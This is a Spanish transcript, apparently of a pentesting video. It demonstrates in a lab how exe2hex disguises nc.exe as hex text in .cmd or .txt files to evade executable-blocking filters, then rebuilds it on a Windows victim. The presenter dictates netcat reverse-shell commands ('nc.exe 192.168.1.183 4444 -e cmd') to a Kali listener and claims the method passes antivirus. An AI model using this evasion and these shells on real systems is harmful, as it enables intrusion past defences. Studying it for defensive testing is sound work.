¿Qué tal, estimados y estimadas? En el video de hoy vamos a realizar un ejercicio de pentesting para aquellos contextos donde el administrador de sistema ha bloqueado la capacidad en la PC de bajar, transferir, subir o mandar mails de archivos .exe. Básicamente vamos a bypassear o evitar esas reglas usando una tool que seguramente muchos la conocen. Se llama exe2ex. Esta tool convierte o transcribe un archivo .exe a una serie de cadenas o string en hexadecimales, por decirlo de alguna forma. Y luego, una vez que este archivo transformado en otra extensión, por decirlo de alguna forma, y que dentro de esa extensión tenga cadenas de hexadecimales o string de hexadecimales, bueno, ese archivo se va a enviar a una máquina Windows y estando ahí en la máquina Windows podemos restaurar ese archivo a su formato original, a su formato original, por decirlo de alguna forma. Lo vamos a volver de vuelta a exe. Y eso lo podemos hacer de dos formas. Bueno, acá en Windows 32 bits lo podemos hacer vía debug.exe y también lo podemos hacer con PowerShell. PowerShell es válido para Windows de 32 bits y 64 bits. En estos ejemplos vamos a hacerlo con PowerShell. Uno de estos escenarios los ve durante las pruebas de penetración donde hay ciertos filtros de carga y de descarga, como por ejemplo un proxy o un WAF. ¿Recuerdan lo que era WAF? Un Web Application Firewall. Bueno, vamos a presentar la forma de eludir todos estos mecanismos usando esta tool. En todos los casos, cuando generemos esa cadena de strings o ese nuevo archivo en hexa a partir de un exe, ustedes van a ver todas las cadenas hexadecimales. Yo se los voy a mostrar que tiene ese nuevo archivo. Básicamente el escenario de trabajo es el siguiente. Vamos a tener una máquina Kali Linux que es la 192.168.1.183 y que va a estar en modo listener, escuchando en el puerto 4444. La máquina de la izquierda es la máquina vulnerable, es un Windows 192.168.1.203. Una vez que podamos bajar el archivo en hexa, que en realidad no es un exe, porque recuerden, en esa computadora tenemos bloqueado la capacidad de bajar o de administrar archivos exe, por decirlo de alguna forma. Entonces, vamos a bajar esos archivos en una extensión X, que ya se las voy a mostrar. Recuerden, esa extensión va a ser una cadena de hexa. Lo bajamos ahí en la .203, con PowerShell lo volvemos de vuelta a .exe y bueno, y ahí ¿qué hicimos? Ahí lo que hicimos fue vulnerar los filtros que había configurado el administrador, pero podemos hacer algo más. Vamos a establecer una conexión en reverse desde el 203 hasta la 183. O sea que este ejercicio, bueno, es un ejemplo que está bastante bueno, en el cual vamos a poner en práctica dos cosas. Evitar o bypassear las reglas configuradas por el administrador. ¿Gracias a quién? Gracias a la tool exe2ex. Y después lo que vamos a hacer, cuando ya estemos en esa máquina con el exe ya reconvertido de vuelta en exe, gracias a esas tools, a debug y a PowerShell, vamos a establecer una conexión en reverse y bueno, y ahí la máquina fue totalmente vulnerable. Así que bueno, seguimos con el video. Bien, vamos a arrancar el laboratorio. Ya para ir ganando tiempo, el Kali Linux lo voy a poner en modo de escucha. Estoy conectado al Kali Linux, tengo dos ventanitas de PuTTY abiertas y lo que vamos a hacer es conectarla o configurarlo, mejor dicho, en modo listener, en modo de escucha. Ahí va a escuchar las conexiones entrantes que vengan, en este caso de la 203, del Windows 10 profesional. Entonces este es el comando, ahí está el netcat escuchando el modo listener. Con respecto a esto, Kali Linux está bueno porque, como saben, Kali Linux es un sistema operativo para realizar pentesting. Kali Linux tiene un repositorio de todos los exes o todos los binarios de Windows, que en este caso nos va a servir para realizar este laboratorio. El que no sepa, está en esta carpeta y como pueden ver, denme un segundo, ls, acá están. Son todos esos archivos que normalmente ustedes seguramente lo deben conocer. Entonces, ¿qué hacemos? Nos volvemos al directorio anterior. Ahí está. Estamos acá en el pad de trabajo de este usuario. Vamos a hacer un clear. Y lo que vamos a hacer, vamos a copiar esos archivos .exe que ustedes pudieron ver ahí, pero vamos a copiar uno solo, el nc.exe. Recuerden que el nc.exe hace referencia en este caso al cliente. ¿Y para qué? Porque nos va a servir para conectarnos al Kali Linux de forma remota. En este caso supongamos que el Kali Linux está en modo server, está en modo de escucha. Entonces copiamos ese archivo .exe, lo copiamos en nuestro directorio de trabajo. Recuerden, ese archivo .exe es el que vamos a transformar en una extensión, en este caso en cmd, pero internamente va a ser un archivo en hexadecimal. Va a tener una cadena de caracteres o de string en hexadecimal. Bien, lo copiamos en nuestro directorio de trabajo. Como pueden ver, ls-lh.exe. Como pueden ver, tiene esta capacidad. Lo que vamos a hacer ahora es utilizar una herramienta que tiene Kali Linux y lo vamos a comprimir un poquito más todavía. Eso lo hacemos con el siguiente comando. Como pudieron ver ahí, se comprimió. Le voy a hacer un clear para que puedan ver mejor. Y vamos a hacer ls-lah para que veamos detalles de la compresión. Y como pueden ver, el tamaño es de 29K.
Ahora lo que queda básicamente es convertir ese nc.exe que está comprimido, lo vamos a convertir en un archivo en exa, pero con extensión cmd. Lo hacemos con el siguiente comando. Como pueden ver, es muy fácil, no hay ninguna ciencia. El "-p" hace referencia de que el proceso de reconversión en la máquina víctima se va a hacer gracias a PowerShell. Y eso lo podemos ver ahora cuando analicemos el archivo generado. Hacemos un ls menos un ls, podemos hacer, a ver, y vemos que acá se generó perfectamente. Ahora lo que vamos a hacer, vamos a leer el contenido de ese archivo generado, del .cmd. Vamos a leer la cabecera y la parte de abajito, por decirlo de alguna forma, las últimas líneas. La cabecera lo leemos con este comando. Pueden ver que estamos hablando de cadenas de string en exa. Y ahora vamos a leer la parte de abajo. Voy a hacer un clear acá. Voy a pegar el comando tail -n3, o sea que muestra las últimas 3 líneas de este archivo que acabamos de generar. Vemos determinado strings, por decirlo de alguna forma, en exa. Y vemos también acá una sentencia en PowerShell que básicamente transforma este archivo, que en realidad es un archivo .exe, lo transforma en un .exe. Todo esto va a suceder cuando este nc.cmd se ejecute en la máquina víctima. Entonces, ahora ¿qué resta? Es llevar este archivo nc.cmd a la máquina víctima. Eso se puede enviar de la forma que ustedes se puedan llegar a imaginar. Yo lo voy a llevar al archivo, no les voy a mostrar cómo, pero ustedes pueden imaginarse de la forma, que se yo, vía mail, vía de lo que sea, vía pendrive, de lo que sea. Bien, ya tenemos el archivo acá. Lo que nos resta hacer es lo siguiente, es abrir una ventana en línea de comandos en cmd y ejecutar este archivo. Y cuando lo ejecutemos a este archivo, ustedes van a ver que se genera un archivo .nc.exe, que es el archivo que nos va a permitir realizar la conexión remota. Y es así como de esta forma se vulneran esos filtros que yo les comentaba al principio, los seteos de seguridad que ha configurado un administrador. Por eso es importante hacer un seteo fino, bien claro. Entonces abrimos una ventana en cmd. Y nos vamos a posicionar donde estamos trabajando, este directorio de prueba. Bueno, vamos a hacer un cls para que puedan ver claro. Vamos a hacer un dir y vamos a ver que acá está el archivito. Entonces, ¿qué hacemos ahora? Un nc.cmd. Yo lo que voy a hacer ahora, porque si yo lo ejecuto, ustedes van a ver un chorizo de cadenas de string, de exa, algo que se realiza y los puede llegar a confundir. Entonces, voy a usar esta treta, denme un segundo, que es para no mostrar la ejecución de este cmd. Un hecho off y ahí se ejecuta. Ya está, ya se ejecutó. Vamos a hacer un dir y vamos a ver que acá se nos generó el archivito, un nc.exe. O sea, se nos generó el ejecutable. Pudimos vulnerar la seguridad seteada por el administrador. Entonces ahora yo lo que voy a hacer es, ¿vieron esa ventana en PuTTY de nuestro Kali Linux en modo listener? Bueno, la vamos a poner acá al costadito y van a ver cuando yo ejecuto este nc, se establece la conexión en reverse y ya el equipo ha sido hackeado. O sea, el equipo no solamente ha sido vulnerado en la cuestión en lo que respecta que un exe ha podido ser enviado a la máquina, siendo que esa máquina, como saben ustedes, ya tenía seteada la cuestión de no aceptar exes de ninguna forma. Entonces, bueno, vamos a abrir esa ventana en Kali Linux en modo listener. Y lo que vamos a hacer es ejecutar ese comandito, el nc.exe. Recuerden que vendría a ser el cliente del Netcat. Acá tenemos que poner nc.exe 192.168.1.183. Recuerden que esta es la máquina Kali Linux y el puerto de escucha es el 4444. -c cmd. Y van a ver cómo a la derecha en la ventana de nuestro Kali Linux que está en modo listener se establece la conexión. Y ahí está, se estableció la conexión. Acá vemos que se ha conectado a la 183, ¿desde dónde? Desde la 203 y la 203 en nuestra máquina víctima. Hacemos un ipconfig acá en el Kali Linux y listo. Ven ustedes claramente que estamos en la máquina víctima. Entonces yo lo que voy a hacer acá en el Kali Linux, voy a hacer un control C y vamos a pasar a la siguiente prueba. Bien, vamos al otro ejemplo. Una de las ventanitas de Kali Linux va a estar en modo listener. Y la otra ventanita de Kali Linux, que es esta, la vamos a configurar o la vamos a usar, por decirlo de alguna forma, para hacer esa modificación de un archivo en exe a cmd. En este caso, el archivo exe está localizado en internet. Normalmente ustedes, seguramente, estoy seguro que sí, así es, han bajado con comandos o con tools como car o wget archivos que están en internet. Bueno, este caso es para eso. Básicamente lo que se hace, para que se entienda, la salida de un comando, por decirlo de alguna forma, o la salida de algo, es la entrada a un proceso que viene por delante. Es la entrada a un nuevo comando. Y esto lo hacemos con el siguiente comando. Y esto es válido cuando el archivo que queremos transformar en exa está en internet y no lo podemos bajar.
Cuando digo el archivo que está en internet, me refiero a un archivo ejecutable. Y bueno, y para hacer esta conversión lo hacemos con este comando. Como pueden ver, acá tenemos un cat nc.exe pipe y todo el chorizo que está relacionado con el comando exe2exe. Básicamente lo que hacemos acá, la salida de algo o la salida de un archivo, por decirlo de alguna forma, o la salida de un comando va a ser la entrada de otro. Básicamente esta es la forma que podemos transformar un exe a hexadecimal. Y bueno, en este caso aplica para aquellos casos cuando, por ejemplo, se me viene a la mente cuando tenemos que bajar algo vía wget o vía car. Aplicamos un enter. Ahí se generó el archivo .cmd, que es el que nos interesa. Hacemos un ls y vemos que está acá. Seguramente se sobrescribió, con el que teníamos hace un ratito. De la misma forma lo llevamos a la máquina víctima, pero yo lo que quiero que entiendan ustedes acá, la forma en la cual se generó este archivo en hexadecimal. Ustedes recuerden que, como bien les dije hace unos segunditos, este archivo está en internet. Este exe está en internet. ¿Entienden? Entonces desde ahí obtenemos la salida con el comando cat nc.exe, por decirlo de alguna forma, y lo concatenamos con el comando exe2exe, donde realizamos toda esa conversión a hexa. Entonces ahora, ¿qué es lo que resta? Es llevar este archivo nc.cmd a nuestra máquina Windows víctima. Bien, ya hemos llevado de la forma que ustedes se pueden imaginar o lo que sea este archivo a nuestra PC víctima de laboratorio. Entonces nos vamos a nuestro CMD de Windows, de OS o como quieran llamarlo. Estamos posicionados en la carpeta donde hicimos esto. Voy a hacer un cls para que quede más claro. Y básicamente vamos a ejecutar este comando, este archivo, este nc.cmd, y van a ver que se va a generar el exe. Lo voy a hacer de una forma distinta a la que lo hice recién para que vean y entiendan lo que les quise decir hace un ratito. Acá se va a ejecutar todo este chorizo de cosas. Se va a tardar un tiempo como se tardó el otro. Ahí terminó. Vamos a hacer un cls, vamos a hacer un dir y van a ver que está el archivo binario, el archivo exe, que es el que nos importa. Entonces básicamente, ¿qué se hace? Se hace lo mismo que hicimos recién. Entonces nos vamos a nuestra ventanita de Kali Linux en modo listener, que acá la tengo, y básicamente hacemos lo mismo y van a ver cómo se realiza la conexión en reverse. Binary.exe 192.168.1.183 -e cmd. ¿Está todo bien? Me faltó el puerto 4444 y listo. Y ahí se estableció la conexión. ipconfig, van a ver que estoy en la 203. Voy a minimizar esto, pero básicamente lo que se hizo acá, para que entiendan, se bajó o se analizó, por decirlo de alguna forma, el contenido de un archivo exe que estaba en internet, que no lo bajamos. ¿Qué significa eso? Que no se rompió el filtro que había puesto o que había seteado el administrador. Y lo que hicimos es, desde internet, transformar la salida de un comando, por decirlo de alguna forma, en la entrada de otro. Si hicimos la conversión de exe a hexadecimal, como pudieron ver. Y bueno, y acá pudieron ver que se estableció la conexión en reverse. Entonces ahora nos resta el último laboratorio, que es el laboratorio que para mí es el más interesante. Bueno, y para mí es la mejor esta prueba, porque básicamente lo que hacemos es enmascarar un archivo exe en un archivo txt. Adentro de ese txt vamos a tener esa cadena de strings en hexadecimales. Básicamente, bueno, vamos a hacer lo mismo que hicimos recién. Nos vamos a una de estas ventanitas de Kali Linux, la ponemos en modo listener y ahí está escuchando. Va a escuchar las conexiones entrantes que vengan de la 203. Y bien, ahora lo que resta es crear un archivo o hacer una conversión o nc.exe a un archivo en txt. Y van a ver que se hace muy fácil. Tenemos que ejecutar este comando. Se creó, como pueden ver, de una forma muy simple. Hacemos un head para leer el contenido en hexa o las cadenas de string y van a ver que es lo mismo. Esto es muy peligroso, porque ¿quién va a pensar que en un txt vamos a tener un problema al respecto? O sea, nadie se imagina esto. Básicamente nadie se lo imagina. Así que lo que vamos a hacer un cls acá, un clear. Y vamos a llevar el archivo, el txt, a nuestra máquina víctima. Ya estamos en nuestra máquina víctima. Como pueden ver, ya hemos localizado el archivo en esta carpeta. Estamos, con nuestra sesión de cmd o DOS en nuestra máquina víctima. En el path donde tenemos este archivo, hacemos un dir y ven que está el nc.txt. Básicamente lo que hay que hacer acá es hacer un rename del archivo, como un renombre del archivo. nc.txt ¿a qué? A nc.cmd. Hacemos un dir y ahí vemos que el archivo ha sido renombrado. Entonces vamos a hacer un cls y lo que vamos a hacer es lo siguiente. nc.cmd pasa todo este chorizo que les mostraba. Recuerden, con el signito mayor y @ hecho off se evitan todo este
palabrería, por decirlo de alguna forma. Hacemos un cls, hacemos un dir y ahí vemos que tenemos el archivo nc.exe. Entonces, ¿qué vamos a hacer? nc.exe, recuerden, este vendría a ser el cliente, 192.168.1.183, espacio 4444, -c, cmd. Vamos a abrir nuestra ventanita de Kali Linux acá arribita para que vean que se realiza la conexión. Ahí está en modo listener. Vamos a correrlo un poquito para acá. Y listo. Ahí, como pudieron ver, se estableció la conexión en reverse, ipconfig, para que vean que estoy ahí, 203. Bien. Como pudieron ver, la verdad es un laboratorio interesante. Es un laboratorio para hacer una fineza en lo que respecta a qué archivos puede manejar un administrador. La verdad que lo he probado en varias máquinas. Este Windows es un Windows de una máquina virtual. Pero lo he probado en máquinas físicas que tienen buenos antivirus y pasa. Pasa como trompada. Así que bueno, si hay algún administrador de Windows o de esta cosa, si nos puede decir de qué forma se puede mitigar esto, pero bien, pero de una forma que uno diga, bueno, acá no va a pasar nada. Para ir resumiendo, como pudieron ver, este es un laboratorio bueno de pentesting para chequear si la computadora que van a testear, valga la redundancia, está bien configurada, está bien seteada para este tipo de ataques. Así que bueno, estimados, les mando un abrazo grande. Cualquier consulta, cualquier duda me la dejan abajo. Cuídense. Chau, chau.